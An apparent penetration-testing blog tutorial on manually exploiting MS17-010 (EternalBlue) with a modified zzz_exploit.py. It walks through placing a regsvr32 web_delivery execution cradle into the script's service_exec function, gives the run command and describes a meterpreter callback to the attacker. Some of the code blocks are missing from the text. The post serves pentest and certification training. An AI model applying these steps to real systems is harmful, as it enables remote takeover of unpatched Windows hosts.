With MS17-010, its very easy to hit a box and get SYSTEM. It has made pen-testers lives much, much, easier. Searching MS17-010 in
Metasploit will display the following:
msf > search ms17 Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/admin/mssql/mssql_enum_domain_accounts normal No Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli normal No Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration auxiliary/admin/mssql/mssql_enum_sql_logins normal No Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration auxiliary/admin/mssql/mssql_escalate_execute_as normal No Microsoft SQL Server Escalate EXECUTE AS auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal No Microsoft SQL Server SQLi Escalate Execute AS auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Here, there are a lot of modules. Most of them have had their signatures hammered and will most likely be caught by any AV. Or, if this exploit is in the context of OSCP, then you aren’t allowed to use these modules.
To avoid using these modules, Worawit wrote a PoC in Python which will be updated and edited through this blog.
As of writing this, the script is able to exploit:
- Windows 2016 x64 - Windows 10 Pro Build 10240 x64 - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 2008 R2 SP1 x64 - Windows 7 SP1 x64 - Windows 2008 SP1 x64 - Windows 2003 R2 SP2 x64 - Windows XP SP2 x64 - Windows 8.1 x86 - Windows 7 SP1 x86 - Windows 2008 SP1 x86 - Windows 2003 SP2 x86 - Windows XP SP3 x86 - Windows 2000 SP4 x86
Worawit put out a GitHub repository full of proof-of-concept code and useful scripts. The note worthy ones are checker.py and zzz_exploit.py.
zzz_exploit.py is the script that will be modified slightly to enable more manual exploitation of MS17-010 and should allow for the exploitation of the previously mentioned Windows variants.
All credit goes to Korey Mckinley and his article, small adjustments were made to this to suit my current set up.
The easiest way to do this with metasploit, is to use the
exploit/multi/script/web_delivery module. This module has multiple methods for calling back to the attacker machine. However, this post will stick to
My Metasploit configuration looked like this:
This should produce an execution cradle that looks like this:
Armed with the
regsvr32 execution cradle, clone Worawit’s repo. Open up
zzz_exploit.py and move to Line 972 or search for the
The first few lines of this function will create a
pwned.txt on the
C:\. This isnt required, so comment out the following:
print('creating file c:\\pwned.txt on the target') tid2 = smbConn.connectTree('C/pre>) fid2 = smbConn.createFile(tid2, '/pwned.txt') smbConn.closeFile(tid2, fid2) smbConn.disconnectTree(tid2)
Underneath that, there will be an example use of
service_exec function. Uncomment this and switch out the payload for the payload generated by
web_delivery. The function should now look similar to this:
The function has now been updated to contain the execution cradle. Run the script against the specified host with
python zzz_exploit.py 192.168.0.35.
If everything went well, then it should look something like this:
regsvr32 is calling back and collecting the payload and the meterpreter session being created.
To avoid using
metasploit all together, Shelby can be used to generate various cradles and shells.
Since writing this post, I have modified the code to allow for an easier user experience, it can be found here.
- Worawit: Twitter
- Worawit: GitHub
- Korey McKinley: Manually Exploiting MS17-010
- Regsvr32 Microsoft Documents
- Checkpoint Research: MS17-010 Analysis